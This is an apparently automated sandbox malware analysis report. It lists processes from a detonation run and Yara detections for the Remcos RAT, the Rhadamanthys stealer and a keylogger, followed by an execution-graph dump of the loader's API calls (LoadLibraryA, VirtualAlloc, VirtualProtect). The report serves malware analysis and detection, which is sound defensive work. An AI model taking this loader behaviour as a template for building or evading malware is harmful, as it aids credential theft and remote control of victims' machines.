                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:30
                                                                                                                                                              Start time:05:26:58
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Users\user\task.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"task.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:40'376 bytes
                                                                                                                                                              MD5 hash:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.4483930249.0000000000176000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:31
                                                                                                                                                              Start time:05:26:59
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                              Imagebase:0xcb0000
                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001F.00000003.1672134784.0000000003480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001F.00000003.1677021053.0000000005430000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001F.00000003.1677266218.0000000005650000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001F.00000002.1765068419.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:32
                                                                                                                                                              Start time:05:27:08
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                              Imagebase:0x7ff77afe0000
                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:33
                                                                                                                                                              Start time:05:27:17
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chrFE01.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/6c77fc35"
                                                                                                                                                              Imagebase:0x7ff6b2cb0000
                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:35
                                                                                                                                                              Start time:05:27:18
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2376,i,16818295695986717264,7118115118329945779,262144 /prefetch:8
                                                                                                                                                              Imagebase:0x7ff6b2cb0000
                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:38
                                                                                                                                                              Start time:05:27:20
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6BC.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/32916e99"
                                                                                                                                                              Imagebase:0x7ff6d8030000
                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:39
                                                                                                                                                              Start time:05:27:21
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2100,i,4541570122865520646,14461282582081406380,262144 /prefetch:3
                                                                                                                                                              Imagebase:0x7ff6d8030000
                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:42
                                                                                                                                                              Start time:05:27:38
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Program Files\Windows Media Player\wmplayer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Windows Media Player\wmplayer.exe"
                                                                                                                                                              Imagebase:0x7ff7839a0000
                                                                                                                                                              File size:171'008 bytes
                                                                                                                                                              MD5 hash:89DCD2D4C0EC638AADC00D3530E07E1D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:43
                                                                                                                                                              Start time:05:27:41
                                                                                                                                                              Start date:21/11/2024
                                                                                                                                                              Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\system32\dllhost.exe"
                                                                                                                                                              Imagebase:0x7ff733cd0000
                                                                                                                                                              File size:21'312 bytes
                                                                                                                                                              MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Disassembly

                                                                                                                                                              Reset < >

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:4.5%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:7%
                                                                                                                                                                Signature Coverage:4%
                                                                                                                                                                Total number of Nodes:1047
                                                                                                                                                                Total number of Limit Nodes:80
                                                                                                                                                                execution_graph 35802 6c8a5c00 35805 6c8a5130 35802->35805 35807 6c8a51a3 35805->35807 35806 6c8a51ea 35819 6c8d5be0 35806->35819 35807->35806 35835 6c8dd7c0 36 API calls __DllMainCRTStartup@12 35807->35835 35814 6c8a5250 35836 6c8a6080 HeapFree 35814->35836 35816 6c8a52be 35837 6c8a6a50 34 API calls 35816->35837 35818 6c8a52f8 35820 6c8d5c14 35819->35820 35822 6c8a5202 35820->35822 35838 6c8e0380 33 API calls __DllMainCRTStartup@12 35820->35838 35830 6c8a5e70 35822->35830 35823 6c8d5c37 35823->35822 35824 6c8d5c70 35823->35824 35839 6c8d39c0 HeapFree __DllMainCRTStartup@12 35823->35839 35840 6c9058e0 33 API calls __DllMainCRTStartup@12 35824->35840 35831 6c8a5221 35830->35831 35832 6c8a5e93 35830->35832 35834 6c8d4110 33 API calls __DllMainCRTStartup@12 35831->35834 35841 6c8a5de0 HeapFree 35832->35841 35834->35814 35835->35806 35836->35816 35837->35818 35838->35823 35839->35824 35841->35831 35842 6c8b0a00 35845 6c8aef00 35842->35845 35846 6c8aef63 __DllMainCRTStartup@12 35845->35846 35848 6c8aefae 35846->35848 35849 6c904f70 35846->35849 35866 6c904fa0 35849->35866 35850 6c905131 35871 6c8def60 36 API calls __DllMainCRTStartup@12 35850->35871 35851 6c905179 35851->35848 35852 6c9051ea 35875 6c9056a0 33 API calls __DllMainCRTStartup@12 35852->35875 35858 6c90518d 35872 6c9055b0 33 API calls __DllMainCRTStartup@12 35858->35872 35862 6c90519e 35873 6c9055b0 33 API calls __DllMainCRTStartup@12 35862->35873 35863 6c9046d0 33 API calls __DllMainCRTStartup@12 35863->35866 35866->35850 35866->35851 35866->35852 35866->35858 35866->35862 35866->35863 35867 6c904fd0 35866->35867 35868 6c8e0540 33 API calls __DllMainCRTStartup@12 35866->35868 35869 6c9050e0 WaitOnAddress 35866->35869 35870 6c8d3980 HeapFree __DllMainCRTStartup@12 35866->35870 35874 6c9055d0 33 API calls __DllMainCRTStartup@12 35867->35874 35868->35866 35869->35866 35869->35869 35870->35866 35871->35851 35876 6c8f08c3 35877 6c8f08ce 35876->35877 35878 6c8f0901 35876->35878 35879 6c8f08f3 35877->35879 35880 6c8f08d3 35877->35880 35904 6c8f0a1d 147 API calls 4 library calls 35878->35904 35888 6c8f0916 35879->35888 35882 6c8f08e9 35880->35882 35883 6c8f08d8 35880->35883 35903 6c8f0f05 23 API calls 35882->35903 35887 6c8f08dd 35883->35887 35902 6c8f0f24 21 API calls 35883->35902 35889 6c8f0922 ___scrt_is_nonwritable_in_current_image 35888->35889 35905 6c8f0f95 35889->35905 35891 6c8f0929 __DllMainCRTStartup@12 35892 6c8f0a15 35891->35892 35893 6c8f0950 35891->35893 35899 6c8f098c ___scrt_is_nonwritable_in_current_image CallUnexpected 35891->35899 35919 6c8f1134 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 35892->35919 35916 6c8f0ef7 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 35893->35916 35896 6c8f0a1c 35897 6c8f095f __RTC_Initialize 35897->35899 35917 6c8f0e1b InitializeSListHead 35897->35917 35899->35887 35900 6c8f096d 35900->35899 35918 6c8f0ecc IsProcessorFeaturePresent ___scrt_release_startup_lock 35900->35918 35902->35887 35903->35887 35904->35887 35906 6c8f0f9e 35905->35906 35920 6c8f141f IsProcessorFeaturePresent 35906->35920 35908 6c8f0faa 35921 6c8f3f0d 10 API calls 2 library calls 35908->35921 35910 6c8f0faf 35915 6c8f0fb3 35910->35915 35922 6c8f82a6 35910->35922 35913 6c8f0fca 35913->35891 35915->35891 35916->35897 35917->35900 35918->35899 35919->35896 35920->35908 35921->35910 35926 6c8fc441 35922->35926 35925 6c8f3f3f 7 API calls 2 library calls 35925->35915 35927 6c8fc451 35926->35927 35928 6c8f0fbc 35926->35928 35927->35928 35930 6c8f91a2 35927->35930 35928->35913 35928->35925 35931 6c8f91ae ___scrt_is_nonwritable_in_current_image 35930->35931 35942 6c8fad0c EnterCriticalSection 35931->35942 35933 6c8f91b5 35943 6c8fd783 35933->35943 35936 6c8f91d3 35958 6c8f91f9 LeaveCriticalSection CallUnexpected 35936->35958 35939 6c8f91e4 35939->35927 35940 6c8f91ce 35957 6c8f90f2 GetStdHandle GetFileType 35940->35957 35942->35933 35944 6c8fd78f ___scrt_is_nonwritable_in_current_image 35943->35944 35945 6c8fd7b9 35944->35945 35946 6c8fd798 35944->35946 35959 6c8fad0c EnterCriticalSection 35945->35959 35967 6c8f87d8 14 API calls __dosmaperr 35946->35967 35949 6c8fd79d 35968 6c8f86f7 41 API calls ___std_exception_copy 35949->35968 35951 6c8f91c4 35951->35936 35956 6c8f903c 44 API calls 35951->35956 35952 6c8fd7f1 35969 6c8fd818 LeaveCriticalSection CallUnexpected 35952->35969 35953 6c8fd7c5 35953->35952 35960 6c8fd6d3 35953->35960 35956->35940 35957->35936 35958->35939 35959->35953 35970 6c8f87eb 35960->35970 35962 6c8fd6f2 35978 6c8f8848 14 API calls __dosmaperr 35962->35978 35963 6c8fd6e5 35963->35962 35977 6c8f8b7e 6 API calls __dosmaperr 35963->35977 35966 6c8fd747 35966->35953 35967->35949 35968->35951 35969->35951 35975 6c8f87f8 __dosmaperr 35970->35975 35971 6c8f8838 35980 6c8f87d8 14 API calls __dosmaperr 35971->35980 35972 6c8f8823 RtlAllocateHeap 35973 6c8f8836 35972->35973 35972->35975 35973->35963 35975->35971 35975->35972 35979 6c8fc504 EnterCriticalSection LeaveCriticalSection __dosmaperr 35975->35979 35977->35963 35978->35966 35979->35975 35980->35973 35981 6c8f0c03 35982 6c8f0c0c 35981->35982 35983 6c8f0c11 35981->35983 36002 6c8f0dd0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 35982->36002 35987 6c8f0acd 35983->35987 35988 6c8f0ad9 ___scrt_is_nonwritable_in_current_image 35987->35988 35989 6c8f0b02 dllmain_raw 35988->35989 35990 6c8f0ae8 35988->35990 35991 6c8f0afd 35988->35991 35989->35990 35992 6c8f0b1c dllmain_crt_dispatch 35989->35992 36003 6c8aa0a0 35991->36003 35992->35990 35992->35991 35995 6c8f0b6e 35995->35990 35996 6c8f0b77 dllmain_crt_dispatch 35995->35996 35996->35990 35998 6c8f0b8a dllmain_raw 35996->35998 35997 6c8aa0a0 __DllMainCRTStartup@12 64 API calls 35999 6c8f0b55 35997->35999 35998->35990 36022 6c8f0a1d 147 API calls 4 library calls 35999->36022 36001 6c8f0b63 dllmain_raw 36001->35995 36002->35983 36004 6c8aa16a 36003->36004 36005 6c8aa0e5 GetProcAddress 36003->36005 36004->35995 36004->35997 36023 6c8aa9a0 36005->36023 36008 6c8aa14e 36033 6c8aaf50 49 API calls __DllMainCRTStartup@12 36008->36033 36010 6c8aa168 36034 6c8aa650 63 API calls __DllMainCRTStartup@12 36010->36034 36012 6c8aa20a 36035 6c8ab030 49 API calls __DllMainCRTStartup@12 36012->36035 36014 6c8aa226 36036 6c8b7190 HeapFree __DllMainCRTStartup@12 36014->36036 36016 6c8aa234 36037 6c8a62c0 HeapFree __DllMainCRTStartup@12 36016->36037 36018 6c8aa249 36038 6c8b7190 HeapFree __DllMainCRTStartup@12 36018->36038 36020 6c8aa25e 36039 6c8a65e0 HeapFree __DllMainCRTStartup@12 36020->36039 36022->36001 36040 6c8a7c70 36023->36040 36025 6c8aaa18 __DllMainCRTStartup@12 36030 6c8aab28 __DllMainCRTStartup@12 36025->36030 36044 6c8ac330 36025->36044 36027 6c8aab98 36050 6c8aae20 33 API calls __DllMainCRTStartup@12 36027->36050 36029 6c8aaa8a __DllMainCRTStartup@12 36029->36027 36031 6c8aabe8 __DllMainCRTStartup@12 36029->36031 36030->36008 36051 6c8a6550 49 API calls __DllMainCRTStartup@12 36031->36051 36033->36010 36034->36012 36035->36014 36036->36016 36037->36018 36038->36020 36039->36004 36041 6c8a7c93 __DllMainCRTStartup@12 36040->36041 36052 6c8bf180 36041->36052 36043 6c8a7cbb __DllMainCRTStartup@12 36043->36025 36232 6c8ac440 36044->36232 36047 6c8ac394 36047->36029 36050->36030 36051->36030 36053 6c8bf1e0 __DllMainCRTStartup@12 36052->36053 36059 6c8bf2ef __DllMainCRTStartup@12 36053->36059 36104 6c8b8800 36053->36104 36058 6c8bf24c 36114 6c8c0480 43 API calls __DllMainCRTStartup@12 36058->36114 36059->36043 36062 6c8bf28f __DllMainCRTStartup@12 36065 6c8bf37d __DllMainCRTStartup@12 36062->36065 36068 6c8bf365 __DllMainCRTStartup@12 36062->36068 36115 6c8c0480 43 API calls __DllMainCRTStartup@12 36062->36115 36065->36068 36117 6c8b3010 40 API calls __DllMainCRTStartup@12 36065->36117 36067 6c8bf545 __DllMainCRTStartup@12 36067->36068 36069 6c8bf647 __DllMainCRTStartup@12 36067->36069 36116 6c8b72e0 34 API calls __DllMainCRTStartup@12 36068->36116 36070 6c8bf6ac 36069->36070 36118 6c8ba760 36069->36118 36079 6c8bf867 __DllMainCRTStartup@12 36070->36079 36128 6c8b6b20 HeapFree __DllMainCRTStartup@12 36070->36128 36073 6c8bf765 __DllMainCRTStartup@12 36074 6c8bf799 36073->36074 36076 6c8bf811 __DllMainCRTStartup@12 36073->36076 36125 6c8b6b20 HeapFree __DllMainCRTStartup@12 36074->36125 36126 6c8b6b20 HeapFree __DllMainCRTStartup@12 36076->36126 36078 6c8bf87f 36127 6c8b6d10 HeapFree __DllMainCRTStartup@12 36078->36127 36129 6c8c0580 45 API calls __DllMainCRTStartup@12 36079->36129 36082 6c8bf970 __DllMainCRTStartup@12 36083 6c8bfa47 __DllMainCRTStartup@12 36082->36083 36086 6c8bf9a9 __DllMainCRTStartup@12 36082->36086 36136 6c8b7110 34 API calls __DllMainCRTStartup@12 36083->36136 36085 6c8bfd55 36137 6c8b6d10 HeapFree __DllMainCRTStartup@12 36085->36137 36087 6c8ba760 __DllMainCRTStartup@12 59 API calls 36086->36087 36091 6c8bfacf __DllMainCRTStartup@12 36087->36091 36089 6c8bfd6d 36138 6c8b72e0 34 API calls __DllMainCRTStartup@12 36089->36138 36092 6c8bfb03 __DllMainCRTStartup@12 36091->36092 36093 6c8bfb65 __DllMainCRTStartup@12 36091->36093 36130 6c8b6d10 HeapFree __DllMainCRTStartup@12 36092->36130 36132 6c8b72d0 HeapFree __DllMainCRTStartup@12 36093->36132 36095 6c8bfcf6 36133 6c8b7110 34 API calls __DllMainCRTStartup@12 36095->36133 36097 6c8bfcae 36131 6c8b72e0 34 API calls __DllMainCRTStartup@12 36097->36131 36099 6c8bfd0e 36134 6c8b6d10 HeapFree __DllMainCRTStartup@12 36099->36134 36102 6c8bfd26 36135 6c8b72e0 34 API calls __DllMainCRTStartup@12 36102->36135 36139 6c8b9960 36104->36139 36107 6c8bb970 36108 6c8bb9d1 __DllMainCRTStartup@12 36107->36108 36109 6c8bb9f1 36108->36109 36165 6c904ec0 WaitOnAddress GetLastError 36108->36165 36162 6c8bba20 36109->36162 36112 6c8bba13 36112->36058 36113 6c9058e0 33 API calls __DllMainCRTStartup@12 36112->36113 36114->36062 36115->36065 36116->36059 36117->36067 36171 6c8b2340 36118->36171 36124 6c8ba7d4 36124->36073 36125->36070 36126->36078 36127->36070 36128->36079 36129->36082 36130->36097 36131->36059 36132->36095 36133->36099 36134->36102 36135->36059 36136->36085 36137->36089 36138->36059 36142 6c8b9a10 36139->36142 36145 6c8b9a90 36142->36145 36155 6c8b9bc0 36145->36155 36149 6c8b9b2e __DllMainCRTStartup@12 36150 6c8b9b4f 36149->36150 36151 6c8b9b6e 36149->36151 36160 6c9056a0 33 API calls __DllMainCRTStartup@12 36150->36160 36161 6c8b9a80 33 API calls __DllMainCRTStartup@12 36151->36161 36154 6c8b880d 36154->36107 36156 6c8b9bd3 __DllMainCRTStartup@12 36155->36156 36157 6c8b9ae3 36156->36157 36158 6c8b9a80 __DllMainCRTStartup@12 33 API calls 36156->36158 36157->36154 36159 6c8b96e0 35 API calls __DllMainCRTStartup@12 36157->36159 36158->36157 36159->36149 36161->36154 36166 6c8af2e0 36162->36166 36164 6c8bba43 __DllMainCRTStartup@12 36164->36112 36165->36109 36167 6c8af31e __DllMainCRTStartup@12 36166->36167 36169 6c8af328 __DllMainCRTStartup@12 36167->36169 36170 6c904c50 33 API calls __DllMainCRTStartup@12 36167->36170 36169->36164 36170->36169 36187 6c8c2880 36171->36187 36173 6c8b234f __DllMainCRTStartup@12 36190 6c8c57c0 36173->36190 36176 6c8bedb0 36177 6c8bee02 __DllMainCRTStartup@12 36176->36177 36212 6c8bb8c0 33 API calls __DllMainCRTStartup@12 36177->36212 36179 6c8bee11 36181 6c8bee54 __DllMainCRTStartup@12 36179->36181 36218 6c9058e0 33 API calls __DllMainCRTStartup@12 36179->36218 36213 6c8b9c00 36181->36213 36183 6c8beea2 __DllMainCRTStartup@12 36219 6c8b62e0 34 API calls __DllMainCRTStartup@12 36183->36219 36185 6c8ba7b0 36186 6c8b7d70 35 API calls __DllMainCRTStartup@12 36185->36186 36186->36124 36196 6c8b79c0 36187->36196 36191 6c8c5846 36190->36191 36195 6c8b2371 36190->36195 36210 6c8af6f0 33 API calls __DllMainCRTStartup@12 36191->36210 36194 6c8c5883 36194->36195 36211 6c8b2380 33 API calls __DllMainCRTStartup@12 36194->36211 36195->36176 36203 6c8b0630 36196->36203 36200 6c8b7a8b 36200->36173 36202 6c8b7a20 36202->36200 36208 6c9056f0 33 API calls __DllMainCRTStartup@12 36202->36208 36204 6c8b064c 36203->36204 36205 6c8b0653 36203->36205 36204->36202 36209 6c905be0 33 API calls __DllMainCRTStartup@12 36204->36209 36205->36204 36206 6c9055d0 __DllMainCRTStartup@12 33 API calls 36205->36206 36207 6c8b0715 36206->36207 36210->36194 36211->36194 36212->36179 36220 6c8ba0d0 36 API calls __DllMainCRTStartup@12 36213->36220 36215 6c8b9c8f 36221 6c8b8360 36215->36221 36217 6c8b9ccb 36217->36183 36219->36185 36220->36215 36222 6c8b83ce 36221->36222 36223 6c8b8394 __DllMainCRTStartup@12 36221->36223 36225 6c8b9ce0 36222->36225 36223->36217 36226 6c8ba310 __DllMainCRTStartup@12 56 API calls 36225->36226 36227 6c8b9d67 36226->36227 36228 6c8b81f0 __DllMainCRTStartup@12 36 API calls 36227->36228 36229 6c8b9d95 36228->36229 36230 6c8b68a0 __DllMainCRTStartup@12 HeapFree 36229->36230 36231 6c8b9daa 36230->36231 36231->36223 36233 6c8ac4af 36232->36233 36234 6c8ac512 36232->36234 36249 6c8a7bc0 33 API calls __DllMainCRTStartup@12 36233->36249 36235 6c8ac51a 36234->36235 36236 6c8ac572 36234->36236 36254 6c8ac3d0 33 API calls __DllMainCRTStartup@12 36235->36254 36255 6c8ac7b0 RtlAllocateHeap GetProcessHeap HeapAlloc __DllMainCRTStartup@12 36236->36255 36238 6c8ac4bb 36250 6c8a8630 36238->36250 36242 6c8ac376 36242->36047 36248 6c905470 33 API calls __DllMainCRTStartup@12 36242->36248 36243 6c8ac56c 36243->36242 36244 6c8a8630 __DllMainCRTStartup@12 33 API calls 36243->36244 36245 6c8ac60f 36244->36245 36246 6c8a8630 __DllMainCRTStartup@12 33 API calls 36245->36246 36247 6c8ac6ba 36246->36247 36249->36238 36251 6c8a8640 36250->36251 36252 6c8a8654 36250->36252 36256 6c9056f0 33 API calls __DllMainCRTStartup@12 36251->36256 36252->36242 36254->36243 36255->36243 36257 6c8c77e0 36260 6c8c6420 36257->36260 36261 6c8c6483 __DllMainCRTStartup@12 36260->36261 36262 6c904f70 __DllMainCRTStartup@12 37 API calls 36261->36262 36263 6c8c64ce 36261->36263 36262->36263 36264 2646869 36265 2646977 36264->36265 36266 264688d 36264->36266 36276 2647b43 36265->36276 36303 26490ea 36266->36303 36269 26468a5 36270 26490ea LoadLibraryA 36269->36270 36275 264691d 36269->36275 36271 26468e7 36270->36271 36272 26490ea LoadLibraryA 36271->36272 36273 2646903 36272->36273 36274 26490ea LoadLibraryA 36273->36274 36274->36275 36277 26490ea LoadLibraryA 36276->36277 36278 2647b66 36277->36278 36279 26490ea LoadLibraryA 36278->36279 36280 2647b7e 36279->36280 36281 26490ea LoadLibraryA 36280->36281 36282 2647b9c 36281->36282 36283 2647bb1 VirtualAlloc 36282->36283 36292 2647bc5 36282->36292 36285 2647bdf 36283->36285 36283->36292 36284 26490ea LoadLibraryA 36286 2647c5d 36284->36286 36285->36284 36299 2647e41 36285->36299 36289 2647cb3 36286->36289 36286->36292 36307 2648ef1 36286->36307 36287 26490ea LoadLibraryA 36287->36289 36289->36287 36291 2647d15 36289->36291 36289->36299 36290 2647ef6 VirtualFree 36290->36292 36291->36299 36302 2647d77 36291->36302 36311 2646cd3 36291->36311 36292->36275 36294 2647e83 36342 2648273 LoadLibraryA 36294->36342 36296 2647e38 36296->36299 36334 2647934 36296->36334 36299->36290 36301 2647e95 36299->36301 36301->36301 36302->36294 36302->36296 36302->36299 36304 2649101 36303->36304 36305 2649128 36304->36305 36348 26471ef LoadLibraryA 36304->36348 36305->36269 36309 2648f06 36307->36309 36308 2648f7c LoadLibraryA 36310 2648f86 36308->36310 36309->36308 36309->36310 36310->36286 36312 2648ef1 LoadLibraryA 36311->36312 36313 2646ce7 36312->36313 36314 2646cef 36313->36314 36343 2648f8f 36313->36343 36314->36299 36325 2646dce 36314->36325 36317 2646d25 VirtualProtect 36317->36314 36318 2646d39 36317->36318 36319 2646d53 VirtualProtect 36318->36319 36320 2648f8f LoadLibraryA 36319->36320 36321 2646d74 36320->36321 36321->36314 36322 2646d8b VirtualProtect 36321->36322 36322->36314 36323 2646d9b 36322->36323 36324 2646db0 VirtualProtect 36323->36324 36324->36314 36326 2648ef1 LoadLibraryA 36325->36326 36327 2646de4 36326->36327 36328 2648f8f LoadLibraryA 36327->36328 36329 2646df4 36328->36329 36330 2646e31 36329->36330 36331 2646dfd VirtualProtect 36329->36331 36330->36302 36331->36330 36332 2646e0d 36331->36332 36333 2646e1c VirtualProtect 36332->36333 36333->36330 36336 2647967 36334->36336 36335 2647a12 36335->36299 36336->36335 36337 2647a59 SysAllocString 36336->36337 36338 2647a41 36336->36338 36337->36338 36338->36335 36339 2647aad SafeArrayCreate 36338->36339 36339->36335 36341 2647ad1 36339->36341 36340 2647b2d SafeArrayDestroy 36340->36335 36341->36340 36341->36341 36342->36299 36344 2646d07 36343->36344 36345 2648faa 36343->36345 36344->36314 36344->36317 36345->36344 36347 2647394 LoadLibraryA 36345->36347 36347->36344 36348->36304 36349 6c8fbdbf 36350 6c8fbdc8 36349->36350 36354 6c8fbdfa 36349->36354 36355 6c8fa9fb 36350->36355 36356 6c8faa06 36355->36356 36359 6c8faa0c 36355->36359 36403 6c8f8afd 6 API calls __dosmaperr 36356->36403 36360 6c8faa12 36359->36360 36404 6c8f8b3c 36359->36404 36363 6c8faa17 36360->36363 36412 6c8f8364 41 API calls CallUnexpected 36360->36412 36380 6c8fbbca 36363->36380 36364 6c8f87eb __dosmaperr 14 API calls 36366 6c8faa36 36364->36366 36367 6c8faa3e 36366->36367 36368 6c8faa53 36366->36368 36369 6c8f8b3c __dosmaperr 6 API calls 36367->36369 36370 6c8f8b3c __dosmaperr 6 API calls 36368->36370 36371 6c8faa4a 36369->36371 36372 6c8faa5f 36370->36372 36409 6c8f8848 14 API calls __dosmaperr 36371->36409 36373 6c8faa63 36372->36373 36374 6c8faa72 36372->36374 36376 6c8f8b3c __dosmaperr 6 API calls 36373->36376 36410 6c8fa742 14 API calls __dosmaperr 36374->36410 36376->36371 36378 6c8faa7d 36411 6c8f8848 14 API calls __dosmaperr 36378->36411 36421 6c8fbd1f 36380->36421 36387 6c8fbc26 36459 6c8f8848 14 API calls __dosmaperr 36387->36459 36388 6c8fbc34 36448 6c8fbe1a 36388->36448 36392 6c8fbc0d 36392->36354 36393 6c8fbc6c 36460 6c8f87d8 14 API calls __dosmaperr 36393->36460 36395 6c8fbc71 36461 6c8f8848 14 API calls __dosmaperr 36395->36461 36396 6c8fbcb3 36397 6c8fbcfc 36396->36397 36463 6c8fb843 41 API calls 2 library calls 36396->36463 36464 6c8f8848 14 API calls __dosmaperr 36397->36464 36399 6c8fbc87 36399->36396 36462 6c8f8848 14 API calls __dosmaperr 36399->36462 36403->36359 36413 6c8f899b 36404->36413 36407 6c8f8b76 TlsSetValue 36408 6c8f8b61 36408->36360 36408->36364 36409->36360 36410->36378 36411->36363 36414 6c8f89cb 36413->36414 36418 6c8f89c7 36413->36418 36414->36418 36420 6c8f88d0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_FlsGetValue 36414->36420 36416 6c8f89df 36417 6c8f89e5 GetProcAddress 36416->36417 36416->36418 36417->36418 36419 6c8f89f5 __dosmaperr 36417->36419 36418->36407 36418->36408 36419->36418 36420->36416 36422 6c8fbd2b ___scrt_is_nonwritable_in_current_image 36421->36422 36424 6c8fbd45 36422->36424 36465 6c8fad0c EnterCriticalSection 36422->36465 36425 6c8fbbf4 36424->36425 36468 6c8f8364 41 API calls 